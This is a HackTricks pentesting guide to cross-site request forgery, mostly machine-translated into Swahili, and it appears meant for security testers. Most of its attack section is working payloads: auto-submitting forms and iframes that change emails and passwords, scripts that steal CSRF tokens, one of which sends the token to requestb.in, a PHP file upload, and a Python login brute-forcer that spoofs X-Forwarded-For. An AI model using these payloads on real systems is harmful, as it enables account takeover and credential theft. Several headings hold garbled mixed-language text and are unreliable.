hacktricks/pentesting-web/csrf-cross-site-request-forgery.md

# CSRF (Cross Site Request Forgery)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>

Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking

**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights

**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!

## Cross-Site Request Forgery (CSRF) Explained

**Cross-Site Request Forgery (CSRF)** ni aina ya udhaifu wa usalama unaopatikana katika programu za wavuti. Inawawezesha washambuliaji kufanya vitendo kwa niaba ya watumiaji wasiojua kwa kutumia vikao vyao vilivyothibitishwa. Shambulio linafanyika wakati mtumiaji, ambaye amejiandikisha kwenye jukwaa la mwathirika, anatembelea tovuti mbaya. Tovuti hii kisha inasababisha maombi kwa akaunti ya mwathirika kupitia mbinu kama vile kutekeleza JavaScript, kuwasilisha fomu, au kupakua picha.

### Prerequisites for a CSRF Attack

Ili kutumia udhaifu wa CSRF, masharti kadhaa yanapaswa kutimizwa:

1. **Tafuta Kitendo Chenye Thamani**: Mshambuliaji anahitaji kupata kitendo kinachostahili kutumiwa, kama kubadilisha nenosiri la mtumiaji, barua pepe, au kuongeza mamlaka.
2. **Usimamizi wa Kikao**: Kikao cha mtumiaji kinapaswa kusimamiwa pekee kupitia kuki au kichwa cha HTTP Basic Authentication, kwani vichwa vingine haviwezi kubadilishwa kwa kusudi hili.
3. **Ukosefu wa Vigezo Visivyoweza Kutabirika**: Ombi halipaswi kuwa na vigezo visivyoweza kutabirika, kwani vinaweza kuzuia shambulio.

### Quick Check

You could **capture the request in Burp** and check CSRF protections and to test from the bowser you can click on **Copy as fetch** and check the request:

<figure><img src="../.gitbook/assets/image (11) (1) (1).png" alt=""><figcaption></figcaption></figure>

### Defending Against CSRF

Hatua kadhaa za kinga zinaweza kutekelezwa ili kulinda dhidi ya shambulio la CSRF:

* [**SameSite cookies**](hacking-with-cookies/#samesite): Sifa hii inazuia kivinjari kutuma kuki pamoja na maombi ya tovuti tofauti. [More about SameSite cookies](hacking-with-cookies/#samesite).
* [**Cross-origin resource sharing**](cors-bypass.md): Sera ya CORS ya tovuti ya mwathirika inaweza kuathiri uwezekano wa shambulio, hasa ikiwa shambulio linahitaji kusoma jibu kutoka kwa tovuti ya mwathirika. [Learn about CORS bypass](cors-bypass.md).
* **User Verification**: Kuuliza nenosiri la mtumiaji au kutatua captcha kunaweza kuthibitisha nia ya mtumiaji.
* **Checking Referrer or Origin Headers**: Kuthibitisha vichwa hivi kunaweza kusaidia kuhakikisha maombi yanatoka kwa vyanzo vinavyotegemewa. Hata hivyo, kuunda URL kwa uangalifu kunaweza kupita ukaguzi usiofaa, kama vile:
* Using `http://mal.net?orig=http://example.com` (URL inamalizika na URL inayotegemewa)
* Using `http://example.com.mal.net` (URL inaanza na URL inayotegemewa)
* **Modifying Parameter Names**: Kubadilisha majina ya vigezo katika maombi ya POST au GET kunaweza kusaidia kuzuia mashambulizi ya kiotomatiki.
* **CSRF Tokens**: Kuingiza tokeni ya kipekee ya CSRF katika kila kikao na kuhitaji tokeni hii katika maombi yanayofuata kunaweza kupunguza hatari ya CSRF kwa kiasi kikubwa. Ufanisi wa tokeni unaweza kuimarishwa kwa kutekeleza CORS.

Kuelewa na kutekeleza ulinzi huu ni muhimu kwa kudumisha usalama na uaminifu wa programu za wavuti.

## Defences Bypass

### From POST to GET

Labda fomu unayotaka kutumia inajiandaa kutuma **POST request with a CSRF token but**, unapaswa **kuangalia** ikiwa **GET** pia ni **halali** na ikiwa unapowasilisha GET request **CSRF token bado inathibitishwa**.

### Lack of token

Programu zinaweza kutekeleza mekanismu ya **kuhakiki tokeni** wakati zipo. Hata hivyo, udhaifu unatokea ikiwa uthibitishaji unakosekana kabisa wakati tokeni haipo. Washambuliaji wanaweza kutumia hili kwa **kuondoa parameter** inayobeba tokeni, si tu thamani yake. Hii inawawezesha kupita mchakato wa uthibitishaji na kufanya shambulio la Cross-Site Request Forgery (CSRF) kwa ufanisi.

### CSRF token is not tied to the user session

Programu **zisizofunga tokeni za CSRF kwenye vikao vya mtumiaji** zina hatari kubwa ya **usalama**. Mifumo hii inathibitisha tokeni dhidi ya **hifadhi ya kimataifa** badala ya kuhakikisha kila tokeni inafungwa kwenye kikao kinachoanzisha.

Hapa kuna jinsi washambuliaji wanavyotumia hili:

1. **Authenticate** kwa kutumia akaunti yao wenyewe.
2. **Obtain a valid CSRF token** kutoka kwenye hifadhi ya kimataifa.
3. **Use this token** katika shambulio la CSRF dhidi ya mwathirika.

Udhaifu huu unawawezesha washambuliaji kufanya maombi yasiyoidhinishwa kwa niaba ya mwathirika, wakitumia **mchakato wa uthibitishaji wa tokeni** wa programu usiofaa.

### Method bypass

Ikiwa ombi linatumia **"weird"** **method**, angalia ikiwa **method** **override functionality** inafanya kazi. Kwa mfano, ikiwa inatumia **PUT** method unaweza kujaribu **kutumia POST** method na **kutuma**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_

Hii inaweza pia kufanya kazi kwa kutuma **\_method parameter ndani ya ombi la POST** au kutumia **vichwa**:

* _X-HTTP-Method_
* _X-HTTP-Method-Override_
* _X-Method-Override_

### Custom header token bypass

Ikiwa ombi linaongeza **custom header** yenye **token** kwa ombi kama **njia ya ulinzi wa CSRF**, basi:

* Jaribu ombi bila **Customized Token na pia header.**
* Jaribu ombi lenye **urefu sawa lakini token tofauti**.

### CSRF token is verified by a cookie

Programu zinaweza kutekeleza ulinzi wa CSRF kwa kuiga tokeni katika kuki na parameter ya ombi au kwa kuweka kuki ya CSRF na kuthibitisha ikiwa tokeni iliyotumwa kwenye backend inalingana na kuki. Programu inathibitisha maombi kwa kuangalia ikiwa tokeni katika parameter ya ombi inalingana na thamani katika kuki.

Hata hivyo, njia hii ina udhaifu kwa shambulio la CSRF ikiwa tovuti ina kasoro zinazomruhusu mshambuliaji kuweka kuki ya CSRF kwenye kivinjari cha mwathirika, kama vile udhaifu wa CRLF. Mshambuliaji anaweza kutumia hili kwa kupakia picha ya udanganyifu inayoweka kuki, ikifuatiwa na kuanzisha shambulio la CSRF.

Hapa kuna mfano wa jinsi shambulio linaweza kuundwa:
```html
<html>
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
</form>
<img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body>
</html>

```
{% hint style="info" %}
Kumbuka kwamba ikiwa **csrf token inahusiana na session cookie hii shambulio halitafanya kazi** kwa sababu utahitaji kuweka mwathirika kwenye session yako, na kwa hivyo utakuwa unajishambulia mwenyewe.
{% endhint %}

### Mabadiliko ya Aina ya Maudhui

Kulingana na [**hii**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests), ili **kuepuka** maombi ya **preflight** kutumia njia ya **POST** hizi ndizo thamani za Aina ya Maudhui zinazoruhusiwa:

* **`application/x-www-form-urlencoded`**
* **`multipart/form-data`**
* **`text/plain`**

Hata hivyo, kumbuka kwamba **mantiki ya seva inaweza kutofautiana** kulingana na **Aina ya Maudhui** iliyotumika hivyo unapaswa kujaribu thamani zilizotajwa na nyingine kama **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._

Mfano (kutoka [hapa](https://brycec.me/posts/corctf\_2021\_challenges)) wa kutuma data ya JSON kama text/plain:
```html
<html>
<body>
<form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
</form>
<script>
form.submit();
</script>
</body>
</html>
```
### Kupita Maombi ya Preflight kwa Takwimu za JSON

Wakati wa kujaribu kutuma takwimu za JSON kupitia ombi la POST, kutumia `Content-Type: application/json` katika fomu ya HTML si rahisi moja kwa moja. Vivyo hivyo, kutumia `XMLHttpRequest` kutuma aina hii ya maudhui huanzisha ombi la preflight. Hata hivyo, kuna mikakati ya kuweza kupita kikomo hiki na kuangalia ikiwa seva inashughulikia takwimu za JSON bila kujali Aina ya Maudhui:

1. **Tumia Aina Mbadala za Maudhui**: Tumia `Content-Type: text/plain` au `Content-Type: application/x-www-form-urlencoded` kwa kuweka `enctype="text/plain"` katika fomu. Njia hii inajaribu kuangalia ikiwa backend inatumia takwimu bila kujali Aina ya Maudhui.
2. **Badilisha Aina ya Maudhui**: Ili kuepuka ombi la preflight huku ukihakikisha seva inatambua maudhui kama JSON, unaweza kutuma takwimu na `Content-Type: text/plain; application/json`. Hii haisababishi ombi la preflight lakini inaweza kushughulikiwa ipasavyo na seva ikiwa imewekwa kukubali `application/json`.
3. **Matumizi ya Faili ya SWF Flash**: Njia isiyo ya kawaida lakini inayowezekana inahusisha kutumia faili ya SWF flash ili kupita vizuizi kama hivi. Kwa ufahamu wa kina wa mbinu hii, rejelea [hiki chapisho](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937).

### Kupita Ukaguzi wa Referrer / Origin

**Epuka kichwa cha Referrer**

Programu zinaweza kuthibitisha kichwa cha 'Referer' tu wakati kiko. Ili kuzuia kivinjari kutuma kichwa hiki, tag ya meta ya HTML ifuatayo inaweza kutumika:
```xml
<meta name="referrer" content="never">
```
Hii inahakikisha kuwa kichwa cha 'Referer' hakijajumuishwa, huenda ikapita mchakato wa uthibitishaji katika baadhi ya programu.

**Regexp bypasses**

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

Ili kuweka jina la kikoa la seva katika URL ambayo Referrer itatuma ndani ya vigezo unaweza kufanya:
```html
<html>
<!-- Referrer policy needed to send the qury parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
</form>
<script>
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
</script>
</body>
</html>
```
### **HEAD method bypass**

Sehemu ya kwanza ya [**hii CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) inaelezea kwamba [mwanzo wa Oak](https://github.com/oakserver/oak/blob/main/router.ts#L281), router imewekwa **kushughulikia maombi ya HEAD kama maombi ya GET** bila mwili wa jibu - suluhisho la kawaida ambalo haliko pekee kwa Oak. Badala ya mpangilio maalum unaoshughulikia maombi ya HEAD, yanapewa tu **mpangilio wa GET lakini programu inatoa tu mwili wa jibu**.

Hivyo, ikiwa ombi la GET linapunguziliwa mbali, unaweza tu **kutuma ombi la HEAD ambalo litashughulikiwa kama ombi la GET**.

## **Mifano ya Kutumia**

### **Kutoa CSRF Token**

Ikiwa **CSRF token** inatumika kama **kinga** unaweza kujaribu **kutoa** kwa kutumia udhaifu wa [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) au udhaifu wa [**Dangling Markup**](dangling-markup-html-scriptless-injection/).

### **GET kwa kutumia lebo za HTML**
```xml
<img src="http://google.es?param=VALUE" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available
```
Mengineyo ya vitambulisho vya HTML5 ambavyo vinaweza kutumika kutuma ombi la GET kiotomatiki ni:
```html
<iframe src="..."></iframe>
<script src="..."></script>
<img src="..." alt="">
<embed src="...">
<audio src="...">
<video src="...">
<source src="..." type="...">
<video poster="...">
<link rel="stylesheet" href="...">
<object data="...">
<body background="...">
<div style="background: url('...');"></div>
<style>
body { background: url('...'); }
</style>
<bgsound src="...">
<track src="..." kind="subtitles">
<input type="image" src="..." alt="Submit Button">
```
### Fomu ya ombi la GET
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form method="GET" action="https://victim.net/email/change-email">
<input type="hidden" name="email" value="some@email.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
### Ombi la POST la Fomu
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
</form>
<script>
document.forms[0].submit(); //Way 3 to autosubmit
</script>
</body>
</html>
```
### Fomu ya ombi la POST kupitia iframe
```html
<!--
The request is sent through the iframe withuot reloading the page
-->
<html>
<body>
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
### **Ombi la Ajax POST**
```html
<script>
var xh;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
}
xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
</script>

<script>
//JQuery version
$.ajax({
type: "POST",
url: "https://google.com",
data: "param=value&param2=value2"
})
</script>
```
### multipart/form-data POST ombi
```javascript
myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
});
```
### multipart/form-data POST request v2
```javascript
// https://www.exploit-db.com/exploits/20009
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true);
//  MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";

//xhr.send(body);
xhr.sendAsBinary(body);
```
### Fomu ya POST ombi kutoka ndani ya iframe
```html
<--! expl.html -->

<body onload="envia()">
<form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
<input type="text" id="pwd" name="pwd" value="otra nueva">
</form>
<body>
<script>
function envia(){document.getElementById("formulario").submit();}
</script>

<!-- public.html -->
<iframe src="2-1.html" style="position:absolute;top:-5000">
</iframe>
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
```
### **K盗a CSRF Token na kutuma ombi la POST**
```javascript
function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;

// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
//console.log(xhr.responseText);
}
}

xhr.send("token=" + token + "&otherparama=heyyyy");
}

function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}

var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();
```
### **K盗a CSRF Token na kutuma ombi la Post kwa kutumia iframe, fomu na Ajax**
```html
<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
</form>

<script type="text/javascript">
function f1(){
x1=document.getElementById("i1");
x1d=(x1.contentWindow||x1.contentDocument);
t=x1d.document.getElementById("token").value;

document.getElementById("token").value=t;
document.getElementById("form1").submit();
}
</script>
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>
```
### **K盗 CSRF Token na kutuma ombi la POST kwa kutumia iframe na fomu**
```html
<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>

<script>
function read()
{
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php"  enctype="multipart/form-data">');
document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
document.writeln('</form>');
document.forms[0].submit.click();
}
</script>
```
### **Kuwaibia token na kuwatumia kwa kutumia 2 iframes**
```html
<script>
var token;
function readframe1(){
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
loadframe2();
}
function loadframe2(){
var test = document.getElementbyId("frame2");
test.src = "http://requestb.in/1g6asbg1?token="+token;
}
</script>

<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>

<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>
</form>
```
### **POSTIibi CSRF token kwa Ajax na kutuma posti na fomu**
```html
<body onload="getData()">

<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
</form>

<script>
var x = new XMLHttpRequest();
function getData() {
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true);
x.send(null);
}
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;
document.getElementById("form").submit();
}
}
</script>
```
### CSRF na Socket.IO
```html
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');

const username = 'admin'

socket.on('connect', () => {
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})

});
</script>
```
## CSRF Login Brute Force

Msimbo unaweza kutumika kufanya Brut Force fomu ya kuingia kwa kutumia token ya CSRF (Pia inatumia kichwa X-Forwarded-For kujaribu kupita uwezekano wa kuorodheshwa kwa IP):
```python
import request
import re
import random

URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"

def init_session():
#Return CSRF + Session (cookie)
r = requests.get(URL)
csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie

def login(user, password):
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
print(f"FOUND {user} : {password}")
return True

with open(PASS_LIST, "r") as f:
for line in f:
login(USER, line.strip())
```
## Tools <a href="#tools" id="tools"></a>

* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
* [https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator)

## References

* [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
* [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
* [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses)
* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)

​

<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>

Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty!

**Hacking Insights**\
Shiriki na maudhui yanayochunguza msisimko na changamoto za hacking

**Real-Time Hack News**\
Endelea kuwa na habari za hivi punde katika ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi

**Latest Announcements**\
Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa

**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo!

{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}